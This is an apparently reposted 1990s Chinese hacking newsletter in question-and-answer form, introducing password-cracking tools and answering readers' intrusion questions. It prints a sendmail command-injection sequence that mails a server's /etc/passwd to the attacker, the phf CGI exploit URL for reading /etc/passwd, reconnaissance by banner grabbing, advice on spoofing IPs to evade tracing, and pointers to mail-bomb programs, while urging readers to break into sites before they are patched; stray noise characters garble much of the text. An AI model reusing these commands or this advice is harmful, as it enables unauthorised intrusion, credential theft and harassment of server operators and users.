這不是一個(gè)教學(xué)文件, 只是告訴你該如何破解系統(tǒng), 好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦,我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人Crack Password 若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負(fù)責(zé) !!寫這些文章真的花了蠻多時(shí)間的, 我也沒辦法確定甚么時(shí)候可以寫好下一篇, 所以沒有辦法預(yù)告, 因?yàn)轭A(yù)告不準(zhǔn)的話會(huì)挨罵的. 以後寫 CoohHC 的時(shí)間會(huì)少很多的, 因?yàn)楣ぷ髟絹碓蕉嗟年P(guān)系, 希望大家見諒, 如果一兩個(gè)月才出現(xiàn)一篇的話也不要罵我喔~ 如果你曾經(jīng)用印表機(jī)把這些文章一篇篇的印出來的話, 你就應(yīng)該知道寫這些東西有多辛苦了,上次在朋友那邊看到, 差點(diǎn)吐血!
1 ~0 p' K! M/ d' D: y事實(shí)上, CoolHC 寫到這里已經(jīng)沒有甚么可以多講的了, 因?yàn)橛泻芏鄸|西并不是用技巧來破解, 我們所使用的都是系統(tǒng)的漏洞. 而這些漏洞, 有些由於已經(jīng)出現(xiàn)了很久, 所以有些網(wǎng)站也已經(jīng)更新了這些問題, 你就沒有辦法得到你所預(yù)期的結(jié)果了. 除非你能夠在他們 Patch 之前先進(jìn)入, 所以就必需要取得最新的 Bugs 資訊.
0 L) E$ S5 b5 c8 F3 X在網(wǎng)路上有很多系統(tǒng)安全討論的 Mail List, 這些 Mail List 討論的內(nèi)容大多與各系統(tǒng)的安全性有關(guān), 所以在討論內(nèi)容上也都會(huì)圍繞著新的 Bugs 打轉(zhuǎn), 如果能夠善加的利用這些資訊, 相信你可以在得到新的 Bug 資料時(shí)就輕易的拿下很多網(wǎng)站的密碼檔案.
6 n2 f4 L2 u5 w, M6 F所以在這一期的內(nèi)容上, 我們就以如何訂閱這些 Mail List 為主題, 讓大家能夠吸收到這些新的資訊, 這樣也不會(huì)等到 CoolHC 寫好的時(shí)候, 大多數(shù)的 Bugs 都已經(jīng)補(bǔ)上了.
9 P9 ]7 ]7 u* Q; W/ |3 I/ G**** Crack 工具 ****9 l' \% i6 H& l. n8 z8 e7 H k7 M& ~
[JackAss V1.1], q' C# d+ B$ p: Z" e1 s' R
許多網(wǎng)友最喜歡的就是這一篇了, 所以這一篇好像是少不了的, 但是軟體更新的速度事實(shí)上可能沒有我們的文章快. 上次介紹的 John the Ripper 1.3 大家用了覺得如何???有沒有甚么大問題呢? 應(yīng)該還不錯(cuò)吧! 這次要介紹的是 JackAss V1.1 是我剛在國外網(wǎng)頁上抓回來的, 也不知道出現(xiàn)了多久, 看一下檔案日期是 4-09-96, 好像已經(jīng)出來很久了, 都沒有注意到它的存在.
- B: n, D/ a( `; Z& S 一般我們以 CJack 來破解密碼檔案的時(shí)候, CJack 是以呼叫字典檔, 然後逐字加密再進(jìn)行比對(duì)的方式來作解碼的動(dòng)作, 所以并不是所有的密碼都找得到, 所以就有人想出以暴力的方式來解碼, 前題是機(jī)器夠快, 然後時(shí)間夠多, 才能避免浪費(fèi)掉很多系統(tǒng)的時(shí)間.CJack 在設(shè)計(jì)的理念上就是這樣, 所以基本上還是略顯不足, 所以才會(huì)有很多的輔助工具出現(xiàn), 像先前幾篇我們所介紹的 KOS 就是一個(gè)例子.6 _) @8 }+ m9 y9 `3 h+ [) E, J
JackAss 基本上是一個(gè)輔助 Jack 的工具, 跟 KOS 一樣, 需要有 CJack 才能夠執(zhí)行,他的英文注解是: Add On For CrackJack, 與 KOS 不同之處是: KOS 對(duì) CJack 的不足處作了補(bǔ)強(qiáng),讓 CJack 可以跑出一些大小寫數(shù)字混合的密碼, 而 JackAss 則是一個(gè)完全不同的方式, 他不需要使用任何的字典檔, 因?yàn)樗旧砭褪且粋€(gè)字典檔產(chǎn)生器. 當(dāng)你使用 JackAss 來作為 CJack 的前導(dǎo), 執(zhí)行 JackAss 之後他會(huì)依照你的選項(xiàng)來制造出字典檔, 然後再呼叫 CJack 來跑這些字.試了一下 JackAss 似乎功能上不怎么樣, 有點(diǎn)類似國內(nèi)上次出現(xiàn)的那支密碼破解程式,不過速度上倒是比較快, 如果你是要用暴力法來破解, 又有幾臺(tái)不錯(cuò)的機(jī)器, 你可以試著在不同的機(jī)器上跑, 這樣速度會(huì)快一點(diǎn), 如果單用一臺(tái)機(jī)器要跑暴力法, 可能就很累了. 當(dāng)然, 如果你可以只跑單一 User 的話, 速度會(huì)快一點(diǎn), 所以我建議拿 JackAss 來跑 root 的部份, 其它的用 GlobalKOS 來跑字典法就行了~~ 不要那么累!5 F: H: b, p$ V- y# X
之前在 tw.comp.security 看到有幾位網(wǎng)友在討論解碼的文章, 其中有一位網(wǎng)友的觀點(diǎn)跟我的有點(diǎn)相像, 他的說法是: 將所有的字典檔先編碼, 存成一個(gè)大型的資料庫, 當(dāng)你抓回密碼檔的時(shí)候, 直接用密碼檔來作逐行的比對(duì), 這樣速度上會(huì)快一點(diǎn), 因?yàn)槭∪チ司幋a的時(shí)間. 如果有人要作這樣的程式的話, 我想應(yīng)該要有一個(gè)不小的硬碟, 用來儲(chǔ)存這個(gè)完成後頗大的資料庫, 然後查詢方面最好是用 SQL 來作查詢, 速度上應(yīng)該會(huì)快一點(diǎn)因?yàn)樵谄渌牟樵兎椒ㄉ? 如果資料庫非常龐大, 可以系統(tǒng)跑起來會(huì)像當(dāng)機(jī)一般吧?? 再者機(jī)器的速度應(yīng)該也要夠快, 最好呢, 能夠?qū)懗鲆粋€(gè) CGI 來 Call 這支程式, 讓大家可以在網(wǎng)頁上丟出 passwd 檔來查詢, 再將查詢完的結(jié)果寄回電子郵件信箱中. 這看起來好像有點(diǎn)神話, 其實(shí)這很容易作到的, 只是沒有人真的這樣作, 是嗎?? 目前還沒預(yù)估過這樣作所須要的主機(jī)配備, 大家有空的時(shí)候幫忙想一想吧??
# v( P/ f O, N6 g2 _9 ^; s [WordList V1.0]
9 T, I% i$ t+ Z b; Z6 G0 s這個(gè)程式是一支字典檔產(chǎn)生器, 他能產(chǎn)生五個(gè)字的字典檔, 就是排列組合啦~ 也沒有用甚么特殊的方法, 使用他來產(chǎn)生字典可以產(chǎn)生一個(gè)相當(dāng)大的字典, 不過速度上相當(dāng)?shù)穆褪橇? 這種程式所產(chǎn)生的字典有點(diǎn)暴力, 因?yàn)樗静灰勒兆值涞姆绞絹懋a(chǎn)生, 但是所產(chǎn)生的字也就相當(dāng)?shù)目捎^, 不過只要密馬是五個(gè)字的, 都一定逃不過~ 屬於暴力法的一種. 速度慢? 慢到甚么程度呢? 你親自的試一下就知道了, 我跑到一半就把它停掉了,不曉得是用甚么語言寫的, 還 For Win 3.x/95, 純 DOS 下無法執(zhí)行. 除了速度慢的缺點(diǎn)之外, 這支程式所跑出來的字典檔是五個(gè)字的, 我覺得真對(duì)五個(gè)字的密碼來作解碼是有點(diǎn)暴力, 不過大家應(yīng)該把自己的密碼弄長一點(diǎn), 因?yàn)橹拔移平獾囊唤M密碼, 居然有人用一個(gè)英文字元來當(dāng)密碼, 系統(tǒng)管理人員應(yīng)該將密碼設(shè)定最少四個(gè)字元, 這樣密碼才不容易被人盜用, 不然就將系統(tǒng)安全作得好一點(diǎn), 不要讓人輕易的拿到 passwd 檔.( ?8 r$ _- A5 u) V6 w4 r
[Q1]8 C o$ u% i6 h
我一進(jìn)去的目錄是"/",我用ls指令後都沒有看到資料夾,有沒有可能是把/etc/passwd隱藏了呢?我進(jìn)去時(shí)先出來的畫面: 220 flag12 Microsoft FTP service (Verision2.0)我又用了anonymous.ftp.這兩個(gè)username進(jìn)去,也成功了而且目錄也都一樣,那有沒有可能passwd不放在這里?
7 U- P' \( j4 Z# e8 p[A1]因?yàn)橐话阄覀冊(cè)谡?password 檔的時(shí)候, 我們測(cè)試(實(shí)作)的 Server 都是使用 Unix 的 Server來作, 所以我會(huì)寫是 /etc/passwd, 照你這個(gè)情況看來, 你進(jìn)入的 FTP Server 應(yīng)該是 WindowNT 的系統(tǒng)(我也沒有把握能夠確定這件事), 如果是這樣的狀況的話, 一般的 WinNT系統(tǒng)是不會(huì)有 /etc 這個(gè)目錄的, 自然也就無法用 ls 指令看到了! 3 _7 Z9 N9 \7 a" S2 S+ t* f% e1 ~
[Q2]我覺得知道某人的IP又能怎樣呢? 現(xiàn)在ISP都是使用不固定的IP呀? 若你說有紀(jì)錄呀?可是像我使用非自己的或是免費(fèi)的呢?像我的網(wǎng)頁就有告訴人家免費(fèi)上網(wǎng)(中研院提供的)查到IP也沒用呀?為何還需要用E-mail bomb 的隱密IP呢?我實(shí)在想不通, 可以告訴我嗎?
' j; |# L( a! @[A2]對(duì)呀!! 但是如果該主機(jī)可以查出該 IP 的確實(shí)上線時(shí)間 (有 Log 檔可查)另外也可以再經(jīng)由電信系統(tǒng)查甚么時(shí)候撥到哪支電話的電話號(hào)碼, 循線就可以逮到你了~ 但是現(xiàn)在電信局不太管這樣的事, 不過如果你犯了很大的錯(cuò), 有檢察官要求他們查, 你說查不查得到 ????? IP 固不固定又很重要嗎 ??? 還是能 Fake IP 是最好的~~ 把 Ping關(guān)掉??呵呵~~ 想通吧!! v, J$ y3 \: [2 z8 l$ Q1 ~; [, v! D
[Q3]1.I can't download KeyPro Emu'. I think the location is wrong. Can you send itto me?/ ]% k. W% a4 F! T, u# e
2.嗨...,UpYours3還是傳不下來...能否告訴我其他地方哪里有? or用別的方法寄來?(真的!沒騙你,我每次下載到1.xMB時(shí),就會(huì)卡住,都不動(dòng)了...)! n1 M, E4 H( l+ f
[Q7]7 u6 g B1 k/ g0 U
你知道嗎?news上俞煌男有寫一個(gè)程式是sendmail 收到password to you know?你是否也有同樣的program?and letmein 2.0不知進(jìn)展如何?0 r) m( Q! O. h! e! A) X9 @7 O
[A7]呵呵~~ Know How 是不是?? 其實(shí)要看他寫出來的東西是針對(duì)哪個(gè) Sendmail 版本啦, 像很多版本的 Sendmail 都有被人家抓出一些 Bug 出來, 那也要看這個(gè) Bug 的危險(xiǎn)性到甚么程度,一般這些東西都會(huì)有人整理出來, 但是如果 Mail Server 使用的剛好不是Bug 有列出來的話, 你可能也沒有辦法了吧?? 我舉一個(gè)很久以前在 Bugtraq 上面看到的 sendmail bug 來作說明好了, 這個(gè) Bug 的版本我忘了, 好像是 sendmail 5.6 的吧(很久了), 現(xiàn)在不曉得還有沒有人在用這個(gè)版本, 如果有的話, 就算他倒霉好了! 是這樣的, 這個(gè)版本的 Sendmail 可以讓人執(zhí)行一些指令, 所以我們可以利用這個(gè)漏洞把passwd 檔寄給自己, 而連到 smtp 就可以控制 sendmail 來發(fā)信了!
( y, C! q# V& f. _: Ptelnet xxx.xxx.xxx 25
1 H. e; e6 C' d/ D1 \) f6 Qhelo MyDear0 }% }. W. n# l+ i
mail from: "|/bin/mail me@myhost </etc/passwd"
1 g. K& `- o; L- z" J: H: K2 vrcpt to: me@myhost
1 H- g* m/ m$ j8 edata$ M5 e7 [ ]! q- ^7 k( h
this is a test mail .
- f6 D' _+ M' z: n像這樣就可以讓這臺(tái)主機(jī)把他自己的 /etc/passwd 寄給我了, 但是也要看他有沒有提供mail這支程式, 有沒有放在 /bin 目錄, 像這目錄也是很重要的, 有的例子我舉出來像cgi hole 我是舉例他放在 /cgi-bin 目錄, 但有些人的目錄名稱是 /cgi 或 /bin 或/exe 就沒有人會(huì)變通, 一直寫信來問我, 為甚么照這個(gè)指令沒有辦法抓到... 等等, 很難講啦, 誰曉得他們目錄命名的方式,都是隨人家高興的嘛~~) W# {: n8 N' N7 d
不過像你所講的, 把這種 Bug 寫成程式來抓 passwd 檔, 那是不是要針對(duì)很多版本的sendmail 都要有判斷? 再針對(duì)每個(gè)版本送出不同的指令? 如果真的可以寫出來這樣的程式的話, 那一定是很不錯(cuò), 不過這應(yīng)該還只是一個(gè)理想吧?? 俞兄如果有寫好的, 請(qǐng)寄送一份給小弟, 我倒想看看程式可以強(qiáng)到甚么程度. 還有, 并不是每個(gè) sendmail Bug 都是連上 smtp 就可以作了, 有些還要寫一些小程式 (Scripts) 才跑才有用, 也就是說你必需要有一個(gè) login 到該 server 的帳號(hào)才行.... 所以..... 難說啦!
% E3 I2 e' ~" d! ]& [+ D) i
6 A' `( D3 n# S, J. H% j* y$ L[Q8] V5 E9 J% o7 \7 S) O5 p
I already download avalanche v2.8 mail bomber,but I can't send it! When I start send the bomb massage,why always receive 553 error ot other error?can you help me how to seng it! # v9 q2 d. J$ V' I0 T* W
[A8]有些 MailBomb 我并沒有實(shí)際的測(cè)試過, 因?yàn)榉N類實(shí)在太多了, 現(xiàn)在好像越來越多人喜歡寫這種程式, 如果你有類似的問題, 可以到我們首頁上的留言版發(fā)問, 相信有用過的網(wǎng)友會(huì)提供你一些設(shè)定上的建議, 讓你的程式能夠正常的運(yùn)作. Y: N: Q( ^9 l- |
[Q9]Hi, I read your hack homepage, it's very good. Do you know any BBS or sitesabout system security & hacking? They are always underground, I can't findthem.Thanks alot.
" {1 v7 l9 c: |3 I9 z: y: f l( F[A9]目前中文的 Hack Homepage 大多都是關(guān)於軟體注冊(cè)碼的網(wǎng)站, 有些網(wǎng)站現(xiàn)在也會(huì)提供一些關(guān)於破解主機(jī)方面的資訊, 我們將在首頁上建立一些網(wǎng)頁的連結(jié)點(diǎn), 讓網(wǎng)友們可以到其它的網(wǎng)站上看看其它的破解資訊, 如果你有建立一個(gè)相關(guān)的網(wǎng)頁的話, 請(qǐng)寫信給我,我會(huì)將你的網(wǎng)頁加入我們站上的連結(jié). 至於 bbs 的話, 各大專院校的 bbs 應(yīng)該都有Hacker 區(qū)的討論, 目前國內(nèi)以交大資工的 Hacker 區(qū)資料最為豐富, 你有空也可以上去看看. bbs.cis.nctu.edu.tw* [- z& A; l6 [9 |/ |
[Q10]很冒昧的打擾你��,小弟拜讀你的大作中 coolhk2 時(shí),便實(shí)地的操練了一下�,當(dāng)小弟在瀏覽器中下達(dá)∶
3 c8 D+ k" H, W1 x) W, Kada99:xxxxxx\cgi-bin\nph-test-cgi@_2A
# k$ B1 `3 k7 W% V7 I' S4 N後,誠如你所說的一份報(bào)表出來如下∶ + m2 p f, `, G( i, i
CGI/1.0 test script report:
$ b0 w$ d' X8 K% Yargc is 1. argv is \*.
]) p6 ` d9 r' |# G! j3 t1 gSERVER_SOFTWARE = Apache/1.0.0, |# r9 b5 n R. [
SERVER_NAME = auto.nypi.edu.tw5 T- V6 n5 T, J, b3 @ I
GATEWAY_INTERFACE = CGI/1.1
- H2 ^: }6 X9 |6 f$ iSERVER_PROTOCOL = HTTP/1.0
5 C: x& x" a, G2 L9 _- zSERVER_PORT = 806 Q8 d% N& g2 Z0 W6 M" [8 [
REQUEST_METHOD = GET8 E5 H6 e; j# T# r( n7 B$ p) _ ]
HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,*/*) R- _+ c/ X3 E5 s3 K: \
PATH_INFO =4 s" H7 {! S1 n& `8 l# C& z# R' x
PATH_TRANSLATED =5 N1 s b+ P F3 L
SCRIPT_NAME = /cgi-bin/nph-test-cgi
r9 k& o; }, U4 @4 M; K( I0 b3 \9 PQUERY_STRING = 2 Count.cgi acc acc.c archie calendar count date discuss doit.cgi dopost.c
% Y) R4 r+ @8 I$ V# t2 qfinger fortune guestmsg guestmsg.c imagemap jj move.pl nph-count nph-test-cgi phf post-query
( p0 u& w' V( D4 z$ l& P' v/ |post.c query ranking re.c repost.c repost.c.bak test-cgi test-cgi.tcl uptime vote.pl wais.pl
2 M/ @" D4 N* ]REMOTE_HOST = 140.130.1.218% |0 Z+ A- j# J2 w8 K* u
REMOTE_ADDR = 140.130.1.218' y: m N7 ]/ p G
REMOTE_USER =, w$ F# z) p H0 @, O9 W4 X7 v
CONTENT_TYPE =
1 n' ]% e5 H' A, GCONTENT_LENGTH =( `/ s! Z8 {. M. ?
但是當(dāng)小弟再接著輸入∶
- [" k0 F) i& a7 p5 ?3 R( e3 Nhttp://xxxxxxxx/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd9 A; d' s: W3 t3 `: K. z
可是卻沒有 passwd 出現(xiàn)�,僅出現(xiàn)如下∶. p) @) P4 Z6 }# X' h* C
Ⅰ.
7 F* I& U; f8 w; ?Server Error
" k5 ~$ O! ?5 h4 Z- V9 {The server encountered an internal error or misconfiguration and
6 j* m1 _4 [" dwas unable to complete your request.
! F4 F: Y$ V! N% SPlease contact the server administrator, allen@auto.nypi.edu.tw and
) z. `- P" \* d! q7 V, E; tinform them of the time the error occurred, and anything you might have$ O4 `/ L5 h$ b0 V! ~
done that may have caused the error.: k+ o$ L2 Y" M- z% ]2 K; X% |' m% g
Ⅱ.
: a6 l4 s/ D1 ]) D2 l4 O) oQuery Results8 r$ S) o; Y& F4 p' A1 d x' n
/usr/local/bin/ph -m alias=x less /etc/passwd : n" M" P/ J3 ^1 \8 A7 ~0 s& u+ S) ]7 `
上面的 Ⅰ及Ⅱ 是小弟分別在不同的站所試出的結(jié)果,請(qǐng)問一下為什么會(huì)如此呢��,是不是小弟指令下錯(cuò)了或者是該站的軟體已經(jīng)把 bug 給 patch 過了��,謝謝你��!0 F) O2 @! p0 T8 B& A, ~
[A10]正如你所說, 可能這個(gè)站臺(tái)已經(jīng)把他們的 httpd Patch 過了, 所以沒有辦法拿到, 也不一定要用 less 指令, 也可以用 more, cat 等指令來試看看, 你上面所下的指令應(yīng)該都正確才對(duì),如果真是已經(jīng) Patch 過了的話, 就只好試試看系統(tǒng)有沒有其它的漏洞羅.這個(gè)漏洞主要是系統(tǒng)所提供的 phf 的 bug, 有些主機(jī)在 test-cgi 的 Report 上的 QueryString 那一行沒有 phf, 也就表示這臺(tái)主機(jī)沒有提供 phf 這個(gè) cgi 讓你使用, 也就沒有辦法用這個(gè)方式來取得 passwd 檔了.
M, M5 [3 p" ~% T$ X' S & h4 K- w1 q3 [7 U% w8 M, n7 Q
[Q11]1. Can you tell me how to find the KOS file by YAHOO.The best of idle is tellme the FTP site.Thank you. :)* ] g% B4 d! Q5 U% R/ e% C
2.我給您發(fā)完信后���,想從您的首頁上拉個(gè)CJACK14下來��,發(fā)現(xiàn)上面好象沒有耶 我點(diǎn)取了那個(gè)名字�,可是報(bào)告說沒有這個(gè)文件���。 (~~~~~~~~~~~~不會(huì)是沒有吧) `( ~* g9 R. I6 l) @% T# H' N
[A11]你現(xiàn)在已經(jīng)可以在 ftp.cads.com.tw/pub/security 中拿到這個(gè)檔, 這是由網(wǎng)友 Robin所提供的ftp, 站臺(tái)上許多程式都可以在這里抓到. 如果你在我們站臺(tái)上抓不下來, 請(qǐng)到這里試試, 如果你想在 Yahoo 上找的話, 尋找 globalkos 這個(gè)關(guān)鍵字, 可以順便連到國外的站臺(tái)看看他們擺了哪些東西, 亦可順便學(xué)點(diǎn)東西喔~~6 M, J3 \: [* k& a7 y3 ]; t7 u" a) K
[Q12]Can you tell me how to check infomation of host? How to know the FTP serverand MAIL server?
/ |0 _1 h4 u4 N. D5 i3 S5 H[A12]對(duì), 有很多網(wǎng)友來信詢問如何破解某某站臺(tái), 如何破解.... 都沒有順便說明一下你們想破解的系統(tǒng)是屬於哪種系統(tǒng), 先教大家看一下系統(tǒng)名稱, 你只要 telnet 進(jìn)入, 當(dāng) Unix提示符號(hào)出現(xiàn)的時(shí)候, 用 uname -svrmn 就可以看到了, 各選項(xiàng)代表的意義如下說明:% A6 Y3 G6 ], n3 w5 B3 Q! i6 \
-s: Show System Name, -v: Show Operating Version, -r: Reveals The Software Release Level-m: Identifies The Machine Hardware For You -n:The node name of the computer is revealed
0 \' c0 U1 ~" |" y# b S另外再來說明一下如何看 Sendmail 版本, 我們只要連到 Port 25 就可以看到了, 如: ! E1 K q2 T6 t( H/ C+ w% ?( d
telnet ms1.xxxxxxxxx.xxx.tw 25# \3 K2 Q( ~* }8 g+ n
220 ms1.xxxxxxxxx.xxx.tw Sendmail 5.65v3.2 (1.1.8.2/30May97-0801PM) Fri, 6 Jun 10 s7 e' M+ H( [- r3 O' m7 O! A
997 11:38:23 +0800
; l) j* N9 E9 M1 y至於 ftp 呢? 你只要連上 ftp 就應(yīng)該會(huì)在畫面上看到他的版本名稱了, 如:& x# V- h* Q$ d8 S- U( O3 V
C:\WINDOWS>ftp ftp.xxxxxxxxx.xxx.tw4 U: x5 q- e a' \# s1 Q2 ~
Connected to ftp.xxxxxxxxx.xxx.tw.1 V- c4 E8 {, w. l, k o* p- w1 \
220-Serv-U FTP-Server v2.2 for WinSock ready...
; e5 @1 ?1 S; g4 |9 V" Y3 r- e220-Welcome to xxxxxxxxxxxx xxx Ftp Server(ftp.xxxxxxxxx.xxx.tw).
5 O2 B- L+ p! b* B220-From xxx.xx.xxx.xx
) r0 Z' i+ h3 {& z[Q13]請(qǐng)問你能否告訴我如何制造mail bomb,因?yàn)樽罱鲜鞘盏綇V告信或者有的沒有的,實(shí)在很
$ |( d! ^6 K: `' W討厭.( R' ^) D8 p% W, ~
[A13]首頁上有一堆Mail Bomb 的程式, 你需要的只是把他們抓下來, 然後在電腦上跑就行了,當(dāng)然里面也都有說明檔之類的文件. 在收到廣告信件的時(shí)候, 請(qǐng)不要一昧的回信, 因?yàn)橛行┌l(fā) MailList 的人, 對(duì)系統(tǒng)的運(yùn)作并不 解, 有時(shí)可能是利用在帳號(hào)目錄設(shè) .foward的方式來發(fā)信的, 而信件中的 Reply to: 欄位填的也是該帳號(hào), 當(dāng)遇到這種情況的時(shí)候,你所發(fā)的信會(huì)讓所有在這個(gè) MailList 的人都收到, 如果所有的收件人都回這封信的話,那你的信箱一定就爆爛了! 所以要先冷靜的分析一下這封信的發(fā)法, 會(huì)不會(huì)傷害到別人,再?zèng)Q定要怎么辦, 千萬別亂炸!~ MailBomb 也會(huì)害到自己的, 切記~ + a. Z2 ]: _9 Y: h# @! ?$ }4 r
[Q14]您好�����!我是XXXXXXXXXXXXXXXXX?����?�!對(duì)於您寫的TXT2DIC 有一點(diǎn)問題��!為什么所建的密碼檔PASSDICT不會(huì)增加�!只是每增加一次字典,PASSDICT會(huì)隨著不同����!
5 D# B" N# G# N# P2 S0 n( S[A14]TXT2DIC 的產(chǎn)生方式會(huì)覆蓋掉舊有的檔案, 所以請(qǐng)?jiān)谑褂玫臅r(shí)候使用不同的檔案名稱,目前最新的 TXT2DIC V1.2 也還沒有使用 File Append 的方式, 所以仍然會(huì)將舊檔案覆蓋, 若你不想覆蓋舊檔, 請(qǐng)使用不同的檔名來進(jìn)行轉(zhuǎn)換! 否則程式將不會(huì)給你任何的警告就把檔案蓋下去了!
3 ?9 N& a$ N, v* g7 k& d
u: O3 |, x, Q$ V' g[Q15]在網(wǎng)路閑逛時(shí)發(fā)現(xiàn)FETAG Software's Hacking Page像發(fā)現(xiàn)寶一樣的下載了Coolhc#1-6,在以前電影���、小說所描述的駭客情節(jié)��,以為只有在外國才有的事��,想不到在臺(tái)灣已有人在這片領(lǐng)域默默的耕耘�����,雖然我不是很聰明但還是很有興趣的想出點(diǎn)力�����。拜讀你的大作似乎有點(diǎn)意猶未盡�,想請(qǐng)教你什么時(shí)候再出第七集�,坊間有什么中文的入門書可參考的。還有想當(dāng)一個(gè)駭客族會(huì)不會(huì)很難�����。, [7 i5 z6 ]# w* D& d: W7 I
[A15]謝謝你的鼓勵(lì), 7 跟 6 之間的確是隔了很久, 且這一篇也沒有講到甚么東西, 有點(diǎn)對(duì)不起大家的等待了. 若想要學(xué)入侵, 希望各位能多看一看 Unix 方面的書, 先將 Unix 的指令讀熟, 最基本的當(dāng)然就是 Shell 指令, 再來就是學(xué)著寫一些簡(jiǎn)單的 Shell Script,若沒有馀力自己找系統(tǒng)的漏洞, 又想要破解站臺(tái), 建議要多看看一些系統(tǒng)安全的 MailList, (好多老話重談), 這一篇就針對(duì) Mail List 的部份, 有簡(jiǎn)單的介紹, 讓大家對(duì)這些系統(tǒng)安全的 Mail List 有些 解, 進(jìn)而多吸收一些知識(shí).
" P0 h W" Y' N/ l- {[Q16]我想請(qǐng)問一下��,我是用Browser抓/etc/passwd的����, 面root的密碼是被編過碼的嗎?我用Crack Jack 1.4解碼�。但是好像不行,到底要用什么解才對(duì)��,一下用Crack Jack,一下又用Brute����,我都看不懂,還有就是UltraEdit是什么����?Pass2Dic有用嗎�?還有我用NetTerm 4.1版for win31可是ftp or sendmail好像都進(jìn)不去�����,是什么原因呢��?另外就是我用CuteFtp 1.8版��,Login設(shè)anonymous or Double�,ID和passwd都空白,但是為什么就可以進(jìn)Ftp�����,然後用NetTerm卻進(jìn)不去? 還有KOS(1.?M)的不會(huì)用����。
% V, H7 B; { a% ^0 ~[A16]好多問題喔~ 我一一的簡(jiǎn)短回答:[1]要看 Passwd 是否是編碼過的, 在 CoolHC#1 中就有說明, 我沒有親眼看到 passwd 檔, 沒有辦法回答. [2]CrackJack 跟 Brute 都是功能相同的程式, CrackJack 速度比較快, 請(qǐng)你先看一下 CoolHC1~6 之後再發(fā)問, 因?yàn)橛泻芏鄸|西都是寫過的了! [3]UltraEdit??? 文書編輯程式, 我用它來寫 Home Page [4]Pass2Dic在 CJack 上已經(jīng)有選項(xiàng)了, 但是在 Brute 之類的成式上就用得到. [5]ftp 有提供匿名登入, 但是在 Telnet 沒有, 所以無法登入. [6] KOS 的用法也寫過了!+ b7 e) I; ?) o( ^1 Z
[Q17]when i use txt2dic.exe , i can't use it first, when i go into the third stepit show " incorrect dos version....done!" secondly, when i gp into the fourthstep , it show" have some error on code-62 "what's wrong ?
5 ?5 B/ p2 [1 O w& b[A17]第一個(gè)問題, 在第三步驟發(fā)生 Incorrect dos version, 你用的是 1.0 版, 所以需要呼叫到 dos 的 sort 程式, 請(qǐng)使用 1.2 版 (For Win32 only) 就不會(huì)有此狀況了! 二,你發(fā)生 Error 62 的狀況, 這在上一次的 FAQ 中也有講過了, 請(qǐng)去翻一翻就 解了! 不過這個(gè)狀況也在 1.2 版改進(jìn)了, 所以建議還是用新的版本, 就不會(huì)有這種狀況發(fā)生了!
$ q, T: D9 q6 C2 \[Q18]When I get a passwd file which is shadowed....Please tell me how to do..../ ]6 \! t# E5 h8 [
[A18]如果我跟你講, 無解呢?? 有些 shadow 過的檔, 只要你有辦法抓到另外一個(gè) shadow 檔是有辦法解開的, 但是單要使用 shadow 過的檔, 我不相信有人能夠解開~ 所以還是要抓到另一個(gè)來 "配對(duì)" 才有用! 至於如何抓到 shadow? 很多人都有這樣的問題, 那就要看系統(tǒng) "提供" 的漏洞多不多了, 不然它 shadow 也就沒有意義羅! 9 Y4 J" X$ b' {* T# J
[Q19]First of all, I'd like to give you some feedbacks about your page.I'm not in Vancouver. I always encounter the slow transfer rate with manyTaiwanese sites. I only got 30 bytes/sec with your site. I don't know thereason... Anyway, you are the first Chinese hacking page I've ever seen.I like that. I just want to learn more. Could yu give me some Chinese hackingpages' addresses? I will be glad to visit them. By the way, I'm not intersetedin emailbombs, because they hurt others. But I'm interested in defensing andcracking emailbombs. I hope you can update your page oftenly. Thanks a lot!7 W* V/ \; }* \& z* ?1 h* W
[A19]謝謝你, 我們會(huì)盡量的更新我們的網(wǎng)頁, 至於其它中文的類似站臺(tái)??? 嗚... 你們?cè)谀睦镅?? 快點(diǎn)現(xiàn)身吧!! 如果大家有找到新的類似站臺(tái)的話, 寄得趕快寫信來告訴我呦~
+ Q3 ?! O/ `8 N6 _6 a0 u- H8 j[Q20]請(qǐng)問我ISP的OS是SunOS5.4,我用貴站上的方法不好用了�,用貴站關(guān)于shadow的link上提到的也不成了,要如何取得其shadow過的passwd呢�?請(qǐng)賜教,多謝��!
9 _/ x; F+ t. C[A20]喔~~ 對(duì)了! 剛才忘了講, 如果各位已經(jīng)試過幾個(gè) Port, 解自己系統(tǒng)的版本編號(hào), 使用的 Sendmail 版本, ftp 版本等的話, 你們可以到 http://underground.org 去看看, 點(diǎn)選左邊那個(gè) Bugs, 然後選一下你所知道的系統(tǒng), 他會(huì)列出一些目前所知的 Bugs 出來, 然候你就可以依樣畫葫蘆啦, 不過那些訊息都是英文的啦~~" {: t: x% i9 B2 N
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* 9 u {( m' ?. T: y
再次重申, Crack 別人站臺(tái)之後不要破壞別人站臺(tái)中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機(jī).... (高-Net 還是除外)... 請(qǐng)勿將這類技術(shù)使用於破壞上(又... 如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機(jī)的話)... 就將它 Shut Down.... 好了! 別太暴力了!
9 ?/ z* F4 m" O+ E- n( U3 a
+ m6 S2 ~" I5 G3 `+ r7 f( D |
發(fā)表于 2011-1-12 16:29:26
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡